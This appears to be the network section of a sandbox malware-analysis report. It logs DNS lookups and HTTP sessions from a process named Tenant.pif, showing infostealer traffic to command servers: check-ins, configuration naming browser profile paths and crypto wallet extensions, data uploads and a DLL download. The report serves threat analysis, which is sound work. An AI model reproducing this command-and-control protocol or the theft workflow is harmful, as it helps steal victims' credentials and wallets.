Aug 29, 2024 20:50:00.239250898 CEST | 59960 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:50:00.239284992 CEST | 443 | 59960 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:50:00.239362955 CEST | 59960 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:50:00.240102053 CEST | 59960 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:50:00.240118027 CEST | 443 | 59960 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:50:01.060120106 CEST | 443 | 59960 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:50:01.060379982 CEST | 59960 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:50:01.060792923 CEST | 59960 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:50:01.060806990 CEST | 443 | 59960 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:50:01.062771082 CEST | 59960 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:50:01.062777996 CEST | 443 | 59960 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:50:01.735766888 CEST | 443 | 59960 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:50:01.735831022 CEST | 443 | 59960 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:50:01.735932112 CEST | 59960 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:50:01.736802101 CEST | 59960 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:50:01.736815929 CEST | 443 | 59960 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:50:02.017688990 CEST | 59961 | 80 | 192.168.2.5 | 95.164.119.162
Aug 29, 2024 20:50:02.022804022 CEST | 80 | 59961 | 95.164.119.162 | 192.168.2.5
Aug 29, 2024 20:50:02.022907019 CEST | 59961 | 80 | 192.168.2.5 | 95.164.119.162
Aug 29, 2024 20:50:02.024888992 CEST | 59961 | 80 | 192.168.2.5 | 95.164.119.162
Aug 29, 2024 20:50:02.024930954 CEST | 59961 | 80 | 192.168.2.5 | 95.164.119.162
Aug 29, 2024 20:50:02.029927015 CEST | 80 | 59961 | 95.164.119.162 | 192.168.2.5
Aug 29, 2024 20:50:02.030119896 CEST | 80 | 59961 | 95.164.119.162 | 192.168.2.5
Aug 29, 2024 20:50:02.030128956 CEST | 80 | 59961 | 95.164.119.162 | 192.168.2.5
Aug 29, 2024 20:50:02.030155897 CEST | 80 | 59961 | 95.164.119.162 | 192.168.2.5
Aug 29, 2024 20:50:03.661551952 CEST | 80 | 59961 | 95.164.119.162 | 192.168.2.5
Aug 29, 2024 20:50:03.661659002 CEST | 59961 | 80 | 192.168.2.5 | 95.164.119.162
Aug 29, 2024 20:50:03.661787987 CEST | 59961 | 80 | 192.168.2.5 | 95.164.119.162
Aug 29, 2024 20:50:03.667243004 CEST | 80 | 59961 | 95.164.119.162 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 29, 2024 20:46:57.295000076 CEST | 62455 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 20:46:57.321804047 CEST | 53 | 62455 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 20:47:38.801476002 CEST | 53 | 50743 | 162.159.36.2 | 192.168.2.5
Aug 29, 2024 20:47:40.248366117 CEST | 53 | 50907 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 20:49:20.473695040 CEST | 55334 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 20:49:20.480823994 CEST | 53 | 55334 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 20:50:01.747929096 CEST | 64107 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 20:50:02.009289980 CEST | 53 | 64107 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 29, 2024 20:46:57.295000076 CEST | 192.168.2.5 | 1.1.1.1 | 0x5f91 | Standard query (0) | gCmUfnfZJOKMjo.gCmUfnfZJOKMjo | A (IP address) | IN (0x0001) | false
Aug 29, 2024 20:49:20.473695040 CEST | 192.168.2.5 | 1.1.1.1 | 0xdc43 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Aug 29, 2024 20:50:01.747929096 CEST | 192.168.2.5 | 1.1.1.1 | 0x2fbf | Standard query (0) | stadiatechnologies.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 29, 2024 20:46:57.321804047 CEST | 1.1.1.1 | 192.168.2.5 | 0x5f91 | Name error (3) | gCmUfnfZJOKMjo.gCmUfnfZJOKMjo | none | none | A (IP address) | IN (0x0001) | false
Aug 29, 2024 20:49:20.480823994 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc43 | No error (0) | steamcommunity.com | | 23.197.127.21 | A (IP address) | IN (0x0001) | false
Aug 29, 2024 20:50:02.009289980 CEST | 1.1.1.1 | 192.168.2.5 | 0x2fbf | No error (0) | stadiatechnologies.com | | 95.164.119.162 | A (IP address) | IN (0x0001) | false
                                                                                      • steamcommunity.com
                                                                                      • 94.130.188.148
                                                                                      • stadiatechnologies.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 59961 | 95.164.119.162 | 80 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
Aug 29, 2024 20:50:02.024888992 CEST | 315 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGI
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: stadiatechnologies.com
                                                                                      Content-Length: 3205
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
Aug 29, 2024 20:50:02.024930954 CEST | 3205 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64
                                                                                      Data Ascii: ------KFCAFIIDHIDGHIECGDGIContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------KFCAFIIDHIDGHIECGDGIContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------KFCAFIIDHIDGHI


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 59937 | 23.197.127.21 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:21 UTC | 119 | OUT | GET /profiles/76561199761128941 HTTP/1.1
                                                                                      Host: steamcommunity.com
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
2024-08-29 18:49:21 UTC | 1870 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                      Cache-Control: no-cache
                                                                                      Date: Thu, 29 Aug 2024 18:49:21 GMT
                                                                                      Content-Length: 34735
                                                                                      Connection: close
                                                                                      Set-Cookie: sessionid=d5508176add0422e08519376; Path=/; Secure; SameSite=None
                                                                                      Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-08-29 18:49:21 UTC | 14514 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-08-29 18:49:21 UTC | 10062 | IN | Data Raw: 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72
                                                                                      Data Ascii: troyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div r
2024-08-29 18:49:21 UTC | 10159 | IN | Data Raw: 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55
                                                                                      Data Ascii: nity.akamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 59938 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:22 UTC | 214 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-29 18:49:23 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-08-29 18:49:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a (Data Ascii: 0, the terminating zero-length chunk of an empty chunked body)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 59939 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:23 UTC | 306 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Content-Length: 254
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-29 18:49:23 UTC | 254 | OUT | Data (multipart body, CRLF line breaks restored from the raw bytes):
------AAKEGIJEHJDGDHJKJKKJ
Content-Disposition: form-data; name="hwid"

2E4FE891DBEA20379026-a33c7340-61ca
------AAKEGIJEHJDGDHJKJKKJ
Content-Disposition: form-data; name="build_id"

283e465e3e8feb6cb806690b98c9bf31
------AAKEGIJEHJDGDHJKJKKJ--
2024-08-29 18:49:24 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-08-29 18:49:24 UTC | 69 | IN | Data (chunked body: one chunk of size 0x3a followed by the terminating 0 chunk):
1|1|1|1|a9a61d3e47c649c77fe9d5f87631f194|1|1|1|1|1|50000|1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 59940 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:25 UTC | 306 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-29 18:49:25 UTC | 331 | OUT | Data (multipart body, CRLF line breaks restored from the raw bytes; the report truncates the body after "Cont"):
------KEBKJDBAAKJDGCBFHCFC
Content-Disposition: form-data; name="token"

a9a61d3e47c649c77fe9d5f87631f194
------KEBKJDBAAKJDGCBFHCFC
Content-Disposition: form-data; name="build_id"

283e465e3e8feb6cb806690b98c9bf31
------KEBKJDBAAKJDGCBFHCFC
Cont
2024-08-29 18:49:25 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-08-29 18:49:25 UTC | 1564 | IN | Data Ascii (chunk size 0x610; base64, truncated in the report):
R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE
Base64-decoded prefix: Google Chrome|\Google\Chrome\User Data|chrome|Google Chrome Canary|\Google\Chrome SxS\User Data|chrome|Chromium|\Chromium\User Data|chrome|Amigo|\Amigo\User Data|chrome|Torch|\Torch\User


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 59941 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:26 UTC | 306 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-29 18:49:26 UTC | 331 | OUT | Data (multipart body, CRLF line breaks restored from the raw bytes; the report truncates the body after "Cont"):
------EBFHJEGDAFHIJKECFBKJ
Content-Disposition: form-data; name="token"

a9a61d3e47c649c77fe9d5f87631f194
------EBFHJEGDAFHIJKECFBKJ
Content-Disposition: form-data; name="build_id"

283e465e3e8feb6cb806690b98c9bf31
------EBFHJEGDAFHIJKECFBKJ
Cont
2024-08-29 18:49:27 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-08-29 18:49:27 UTC | 5685 | IN | Data Ascii (chunk size 0x1628; base64, truncated in the report):
TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb
Base64-decoded prefix: MetaMask|1|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|MetaMask|1|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|1|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|TronLink|1|ibnejdfjmmkpcnlpebklmnkoe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 59942 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:27 UTC | 306 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-29 18:49:27 UTC | 332 | OUT | Data (multipart body, CRLF line breaks restored from the raw bytes; the report truncates the body after "Cont"):
------KKFCFBKFCFBFIDGCGDHJ
Content-Disposition: form-data; name="token"

a9a61d3e47c649c77fe9d5f87631f194
------KKFCFBKFCFBFIDGCGDHJ
Content-Disposition: form-data; name="build_id"

283e465e3e8feb6cb806690b98c9bf31
------KKFCFBKFCFBFIDGCGDHJ
Cont
2024-08-29 18:49:28 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-08-29 18:49:28 UTC | 119 | IN | Data Ascii (one chunk of size 0x6c followed by the terminating 0 chunk; base64):
TWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Base64-decoded: MetaMask|1|webextension@metamask.io|Ronin Wallet|1|ronin-wallet@axieinfinity.com|


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 59943 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:29 UTC | 307 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Content-Length: 6797
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-29 18:49:29 UTC | 6797 | OUT | Data (multipart body, CRLF line breaks restored from the raw bytes; the report truncates the body after "Cont"):
------CBFCBKKFBAEHJKEBKFCB
Content-Disposition: form-data; name="token"

a9a61d3e47c649c77fe9d5f87631f194
------CBFCBKKFBAEHJKEBKFCB
Content-Disposition: form-data; name="build_id"

283e465e3e8feb6cb806690b98c9bf31
------CBFCBKKFBAEHJKEBKFCB
Cont
2024-08-29 18:49:30 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-08-29 18:49:30 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a (Data Ascii: 2ok0, that is, a 2-byte chunk "ok" followed by the terminating 0 chunk)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 59944 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-29 18:49:30 UTC | 222 | OUT | GET /sqlr.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-29 18:49:31 UTC | 263 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:31 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Connection: close
Last-Modified: Thursday, 29-Aug-2024 18:49:31 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
2024-08-29 18:49:31 UTC | 16121 | IN | Data Ascii (first chunk of the response body; the MZ signature, DOS stub and Rich header identify it as a PE file): MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                      Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                      2024-08-29 18:49:31 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                      Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 59945 | Destination IP: 94.130.188.148 | Destination Port: 443 | PID: 2260 | Process: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp: 2024-08-29 18:49:34 UTC | Bytes transferred: 306 | Direction: OUT | Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Content-Length: 829
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: 2024-08-29 18:49:34 UTC | Bytes transferred: 829 | Direction: OUT | Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------KKFCFBKFCFBFIDGCGDHJCont
Timestamp: 2024-08-29 18:49:35 UTC | Bytes transferred: 158 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Timestamp: 2024-08-29 18:49:35 UTC | Bytes transferred: 12 | Direction: IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 59946 | Destination IP: 94.130.188.148 | Destination Port: 443 | PID: 2260 | Process: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp: 2024-08-29 18:49:35 UTC | Bytes transferred: 306 | Direction: OUT | Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBKJJJDHDGDAAKECAKJD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: 2024-08-29 18:49:35 UTC | Bytes transferred: 437 | Direction: OUT | Data Ascii: ------CBKJJJDHDGDAAKECAKJDContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------CBKJJJDHDGDAAKECAKJDContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------CBKJJJDHDGDAAKECAKJDCont
Timestamp: 2024-08-29 18:49:36 UTC | Bytes transferred: 158 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Timestamp: 2024-08-29 18:49:36 UTC | Bytes transferred: 12 | Direction: IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 59947 | Destination IP: 94.130.188.148 | Destination Port: 443 | PID: 2260 | Process: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp: 2024-08-29 18:49:36 UTC | Bytes transferred: 306 | Direction: OUT | Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
